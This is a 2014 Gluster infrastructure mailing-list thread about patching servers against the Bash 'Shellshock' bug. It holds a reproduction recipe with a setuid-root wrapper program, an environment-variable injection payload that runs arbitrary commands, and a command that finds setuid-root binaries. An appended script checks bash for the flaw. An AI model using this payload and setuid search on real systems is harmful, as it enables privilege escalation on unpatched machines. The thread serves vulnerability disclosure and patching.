[Gluster-infra] Updates to Gluster Infra boxen required

Dan Lambright dlambrig at redhat.com
Thu Sep 25 13:26:02 UTC 2014


I was able to reproduce the BASH security hole with the recipe below. It seems like a very significant problem.


---

// Create a file runscript.c

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
   setuid( 0 );
   system( "/usr/local/bin/test.sh");
   return 0;
}

// Compile it

gcc runscript.c -o runscript

// Make it owned by root, and set the setuid bit so anyone who runs it will have root privs.

sudo chown root:root runscript
sudo chmod 4755 runscript

// Now make an empty script.

sudo touch /usr/local/bin/test.sh

// So if a hacker was able to find a program with "runscript's" characteristics, this would be enough to take over a system: any program owned by root with the setuid bit set that also happens to spawn off a shell. [1] lists some.

To demonstrate, make an environment variable that contains arbitrary code. It will be executed whenever "runscript" is run.
declare -x var='() { :;}; /usr/bin/tail -n 5 /var/log/messages'

// as a non privileged user, you will be able to see the contents of /var/log/messages.
// You could put any command into the environment variable "var".

// To find what files have setgid : 

find directory -user root -perm -4000 -exec ls -ldb {} \;

[1]
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ 

----- Original Message -----
> From: "Luis Pabón" <lpabon at redhat.com>
> To: "Justin Clift" <justin at gluster.org>, "Harshavardhana" <harsha at harshavardhana.net>, "Emmanuel Dreyfus"
> <manu at netbsd.org>, "Michael Scherer" <mscherer at redhat.com>, "Louis Zuckerman" <me at louiszuckerman.com>
> Cc: "Gluster Infra" <gluster-infra at gluster.org>
> Sent: Thursday, September 25, 2014 6:43:36 AM
> Subject: Re: [Gluster-infra] Updates to Gluster Infra boxen required
> 
> Sure, I'll take care of those systems.
> 
> - Luis
> 
> On 09/24/2014 11:12 AM, Justin Clift wrote:
> > Hi guys,
> >
> > In light of this, bash needs to be updated across all of our infrastructure
> > boxes (including the various slave VMs):
> >
> >    https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
> >
> > I'll take care of:
> >
> >    * the slave2*.cloud.gluster.org VM's
> >    * www.gluster.org
> >    * download.gluster.org
> >    * review.gluster.org
> >    * build.gluster.org
> >    * engg.gluster.com
> >    * backups.cloud.gluster.org
> >    * staging.gluster.org
> >
> > Harsha, are you ok to update the freebsd0 VM?
> > Manu, ditto for the netbsd ones?
> > Louis, same for gluster-sonar?
> > Misc, same for salt-master.gluster.org?
> >
> > Luis, these are yours aren't they?  If so, would you ok
> > to double check that they're ok?
> >
> >    * g4s-rackspace-el6-1
> >    * g4s-rackspace-f19-1
> >    * g4s-rackspace-f19-3
> >    * g4s-rackspace-f19-4
> >    * gfs-rackspace-f20-1
> >    * tiny-rackspace-f20-1
> >    * gluster-swift2
> >
> > Regards and best wishes,
> >
> > Justin Clift
> >
> > --
> > GlusterFS - http://www.gluster.org
> >
> > An open source, distributed file system scaling to several
> > petabytes, and handling thousands of clients.
> >
> > My personal twitter: twitter.com/realjustinclift
> >
> 
> _______________________________________________
> Gluster-infra mailing list
> Gluster-infra at gluster.org
> http://www.gluster.org/mailman/listinfo/gluster-infra
>
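A defender-side check for the behaviour described in the message above, added here as an example and not part of the original thread: it asks the installed bash whether it still runs code appended to an environment-imported function definition, and whether it imports functions from a plain variable at all. It assumes bash is on PATH; the variable name and marker strings are constructed for the test.

```shell
#!/bin/sh
# Added example (not from the original message). Probes the local bash for the
# environment-variable function-import behaviour behind the recipe above.
# Assumption: "bash" is on PATH. Variable name "x" and the markers are constructed.

# Returns 0 when bash ignores the trailing command (patched), 1 when it runs it.
# A patched bash stops parsing at the closing brace of the function body; an
# unpatched one keeps going and executes "echo INJECTED" during startup,
# before the -c command is even looked at.
check_trailing_command() {
    out=$(env x='() { :;}; echo INJECTED' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *INJECTED*) echo "vulnerable: trailing command executed"; return 1 ;;
        *)          echo "patched: trailing command ignored";     return 0 ;;
    esac
}

# Returns 0 when bash does NOT turn a plain variable "x=() { ...; }" into a
# function, 1 when it does. Fixed bash only imports functions from specially
# named variables, so an ordinary variable named "x" must stay a plain string.
check_plain_variable_import() {
    out=$(env x='() { echo IMPORTED; }' bash -c 'x 2>/dev/null' 2>/dev/null)
    case "$out" in
        *IMPORTED*) echo "imports functions from plain variables"; return 1 ;;
        *)          echo "plain variables are not imported as functions"; return 0 ;;
    esac
}

# Combined verdict: 0 only when both checks pass.
bash_env_import_status() {
    rc=0
    check_trailing_command      || rc=1
    check_plain_variable_import || rc=1
    return $rc
}

bash_env_import_status
```

Run it on each box after the update; a non-zero exit means the installed bash still needs attention.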

